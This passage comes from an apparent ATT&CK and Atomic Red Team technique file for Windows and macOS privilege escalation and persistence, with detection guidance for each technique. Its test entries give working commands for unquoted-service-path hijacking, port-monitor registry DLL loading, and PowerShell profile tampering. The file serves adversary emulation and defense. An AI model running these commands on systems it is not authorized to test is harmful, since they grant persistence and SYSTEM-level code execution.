Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) - - ### PATH Environment Variable Misconfiguration - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - - ### Search Order Hijacking - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). - external_references: - - source_name: mitre-attack - external_id: T1034 - url: https://attack.mitre.org/techniques/T1034 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ - description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking - via .cmd or .bat file. Retrieved July 25, 2016. - source_name: TechNet MS14-019 - - url: http://support.microsoft.com/KB/103000 - description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. - Retrieved November 30, 2014. - source_name: Microsoft Subkey - - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Baggett, M. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved December 4, 2014. - source_name: Baggett 2012 - - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - source_name: SecurityBoulevard Unquoted Services APR 2018 - - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: McFarland, R. (2018, January 26). Windows Privilege Escalation - Guide. Retrieved August 10, 2018. - source_name: SploitSpren Windows Priv Jan 2018 - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 - description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December - 5, 2014. - source_name: Hill NT Shell - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx - description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. - source_name: MSDN Environment Property - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-07-06T18:49:35.645Z' - created: '2017-05-31T21:30:36.140Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_effective_permissions: - - User - - Administrator - - SYSTEM - x_mitre_detection: "Monitor file creation for files named after partial directories - and in locations that may be searched for common processes through the environment - variable, or otherwise should not be user writable. Monitor the executing - process for process executable paths that are named for partial directories. - Monitor file creation for programs that are named after Windows system programs - or programs commonly executed without a path (such as \"findstr,\" \"net,\" - and \"python\"). If this activity occurs outside of known administration activity, - upgrades, installations, or patches, then it may be suspicious. \n\nData and - events should not be viewed in isolation, but as part of a chain of behavior - that could lead to other activities, such as network connections made for - Command and Control, learning details about the environment through Discovery, - and Lateral Movement." - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '1.0' - x_mitre_deprecated: true - atomic_tests: [] - T1574.007: - technique: - created: '2020-03-13T14:10:43.424Z' - modified: '2020-09-16T16:56:34.583Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by PATH Environment Variable - description: |- - Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. - - The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. - - For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1574.008: - technique: - id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. - - Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. - - For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) - - Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). - name: Path Interception by Search Order Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.008 - url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-159 - source_name: capec - url: https://capec.mitre.org/data/definitions/159.html - - url: http://msdn.microsoft.com/en-us/library/ms682425 - description: Microsoft. (n.d.). CreateProcess function. Retrieved December - 5, 2014. - source_name: Microsoft CreateProcess - - source_name: Windows NT Command Shell - url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved - December 5, 2014. - - url: http://msdn.microsoft.com/en-us/library/ms687393 - description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. - source_name: Microsoft WinExec - - source_name: Microsoft Environment Property - url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - description: Microsoft. (2011, October 24). Environment Property. Retrieved - July 27, 2016. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:03:35.217Z' - created: '2020-03-13T17:48:58.999Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: | - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - Administrator - - User - - SYSTEM - x_mitre_effective_permissions: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1574.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.009 - url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-38 - source_name: capec - url: https://capec.mitre.org/data/definitions/38.html - - source_name: Microsoft CurrentControlSet Services - url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services - Registry Tree. Retrieved March 16, 2020. - - source_name: Help eliminate unquoted path - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - description: Mark Baggett. (2012, November 8). Help eliminate unquoted path - vulnerabilities. Retrieved November 8, 2012. - - source_name: Windows Unquoted Services - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted - Services. Retrieved August 10, 2018. - - source_name: Windows Privilege Escalation Guide - url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. - Retrieved August 10, 2018. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by Unquoted Path - description: |- - Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - - Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) - - This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:05:23.755Z' - created: '2020-03-13T13:51:58.519Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - identifier: T1574.009 - atomic_tests: - - name: Execution of program.exe as service with unquoted service path - auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - description: | - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability - known as Unquoted Service Path which allows a user to gain SYSTEM privileges. - In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. - supported_platforms: - - windows - input_arguments: - service_executable: - description: Path of the executable used for the service and as the hijacked - program.exe - type: path - default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe - executor: - command: | - copy #{service_executable} "C:\Program Files\windows_service.exe" - copy #{service_executable} "C:\program.exe" - sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto - sc start "Example Service" - cleanup_command: | - sc stop "Example Service" >nul 2>&1 - sc delete "Example Service" >nul 2>&1 - del "C:\Program Files\windows_service.exe" >nul 2>&1 - del "C:\program.exe" >nul 2>&1 - del "C:\Time.log" >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.011: - technique: - created: '2020-01-24T20:02:59.149Z' - modified: '2020-06-20T19:57:36.136Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a - description: "Adversaries may modify plist files to run a program during system - boot or user login. Property list (plist) files contain all of the information - that macOS and OS X uses to configure applications and services. These files - are UTF-8 encoded and formatted like XML documents via a series of keys surrounded - by < >. They detail when programs should execute, file paths to the executables, - program arguments, required OS permissions, and many others. plists are located - in certain locations depending on their purpose such as /Library/Preferences - (which execute with elevated privileges) and ~/Library/Preferences - (which execute with a user's privileges). \n\nAdversaries can modify plist - files to execute their code as part of establishing persistence. plists may - also be used to elevate privileges since they may execute in the context of - another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for - execution at login is com.apple.loginitems.plist.(Citation: Methods - of Mac Malware Persistence) Applications under this plist run under the logged - in user's context, and will be started every time the user logs in. Login - items installed using the Service Management Framework are not visible in - the System Preferences and can only be removed by the application that created - them.(Citation: Adding Login Items) Users have direct control over login items - installed using a shared file list which are also visible in System Preferences - (Citation: Adding Login Items). Some of these applications can open visible - dialogs to the user, but they don’t all have to since there is an option to - \"hide\" the window. If an adversary can register their own login item or - modified an existing one, then they can use it to execute their code for a - persistence mechanism each time the user logs in (Citation: Malware Persistence - on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled - can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) - can do this as well. (Citation: Adding Login Items)" - name: Plist Modification - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.011 - url: https://attack.mitre.org/techniques/T1547/011 - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html - description: Apple. (2016, September 13). Adding Login Items. Retrieved July - 11, 2017. - source_name: Adding Login Items - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. - - All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) - - Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.011 - atomic_tests: - - name: Plist Modification - auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - description: 'Modify MacOS plist file in one of two directories - -' - supported_platforms: - - macos - executor: - steps: | - 1. Modify a .plist in - - /Library/Preferences - - OR - - ~/Library/Preferences - - 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) - name: manual - T1547.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.010 - url: https://attack.mitre.org/techniques/T1547/010 - - url: http://msdn.microsoft.com/en-us/library/dd183341 - description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, - 2014. - source_name: AddMonitor - - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf - description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint - slides]. Retrieved November 12, 2014. - source_name: Bloxham - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Monitors - description: "Adversaries may use port monitors to run an attacker supplied - DLL during system boot for persistence or privilege escalation. A port monitor - can be set through the AddMonitor API call to set a DLL to be - loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 - and will be loaded by the print spooler service, spoolsv.exe, on boot. The - spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) - Alternatively, an arbitrary DLL can be loaded if permissions allow writing - a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* - Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this - technique to load malicious code at startup that will persist on system reboot - and execute as SYSTEM." - id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-01-24T19:46:27.750Z' - created: '2020-01-24T19:46:27.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: - AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are - abnormal. New DLLs written to the System32 directory that do not correlate - with known good software or patching may be suspicious. \n\nMonitor Registry - writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - Run the Autoruns utility, which checks for this Registry key as a persistence - mechanism (Citation: TechNet Autoruns)" - x_mitre_data_sources: - - File monitoring - - API monitoring - - DLL monitoring - - Windows Registry - - Process monitoring - x_mitre_contributors: - - Stefan Kanthak - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.010 - atomic_tests: - - name: Add Port Monitor persistence in Registry - auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent - reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. - supported_platforms: - - windows - input_arguments: - monitor_dll: - description: Addition to port monitor registry key. Normally refers to a - DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions - allow writing a fully-qualified pathname for that DLL. - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" - /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - -' - cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - -' - name: command_prompt - elevation_required: true - T1055.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.002 - url: https://attack.mitre.org/techniques/T1055/002 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Portable Executable Injection - description: "Adversaries may inject portable executables (PE) into processes - in order to evade process-based defenses as well as possibly elevate privileges. - PE injection is a method of executing arbitrary code in the address space - of a separate live process. \n\nPE injection is commonly performed by copying - code (perhaps without a file on disk) into the virtual address space of the - target process before invoking it via a new thread. The write can be performed - with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, - then invoked with CreateRemoteThread or additional code (ex: - shellcode). The displacement of the injected code does introduce the additional - requirement for functionality to remap memory references. (Citation: Endgame - Process Injection July 2017) \n\nRunning code in the context of another process - may allow access to the process's memory, system/network resources, and possibly - elevated privileges. Execution via PE injection may also evade detection from - security products since the execution is masked under a legitimate process. " - id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:19:58.813Z' - created: '2020-01-14T01:27:31.344Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread and those that can be used to modify - memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.013 - url: https://attack.mitre.org/techniques/T1546/013 - - source_name: Microsoft About Profiles - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 - description: Microsoft. (2017, November 29). About Profiles. Retrieved June - 14, 2019. - - source_name: ESET Turla PowerShell May 2019 - url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell - usage. Retrieved June 14, 2019. - - source_name: Wits End and Shady PowerShell Profiles - url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html - description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege - Elevation using the Powershell Profile. Retrieved July 8, 2019.' - - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf - description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING - CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. - source_name: Malware Archaeology PowerShell Cheat Sheet - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: PowerShell Profile - description: "Adversaries may gain persistence and elevate privileges by executing - malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) - is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) - starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) - supports several profiles depending on the user or host program. For example, - there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) - host programs such as the PowerShell console, PowerShell ISE or Visual Studio - Code. An administrator can also configure a profile that applies to all users - and host programs on the local computer. (Citation: Microsoft About Profiles) - \n\nAdversaries may modify these profiles to include arbitrary commands, functions, - modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) - drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) - session the modified script will be executed unless the -NoProfile - flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) - \n\nAn adversary may also be able to escalate privileges if a script in a - PowerShell profile is loaded and executed by an account with higher privileges, - such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" - id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:31:31.082Z' - created: '2020-01-24T15:11:02.758Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: - - * $PsHome\Profile.ps1 - * $PsHome\Microsoft.{HostProgram}_profile.ps1 - * $Home\My Documents\PowerShell\Profile.ps1 - * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 - - Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. - x_mitre_data_sources: - - PowerShell logs - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Allen DeRyke, ICE - x_mitre_platforms: - - Windows - identifier: T1546.013 - atomic_tests: - - name: Append malicious start-process cmdlet - auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' - description: 'Appends a start process cmdlet to the current user''s powershell - profile pofile that points to a malicious executable. Upon execution, calc.exe - will be launched. - -' - supported_platforms: - - windows - input_arguments: - exe_path: - description: Path the malicious executable - type: Path - default: calc.exe - ps_profile: - description: Powershell profile to use - type: String - default: "$profile" - dependency_executor_name: powershell - dependencies: - - description: 'Ensure a powershell profile exists for the current user - -' - prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - -' - get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - -' - executor: - command: | - Add-Content #{ps_profile} -Value "" - Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" - powershell -Command exit - cleanup_command: | - $oldprofile = cat $profile | Select-Object -skiplast 1 - Set-Content $profile -Value $oldprofile - name: powershell - T1547.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.012 - url: https://attack.mitre.org/techniques/T1547/012 - - source_name: Microsoft AddPrintProcessor May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor - description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved - October 5, 2020. - - source_name: ESET PipeMon May 2020 - url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - description: Tartare, M. et al. (2020, May 21). No “Game 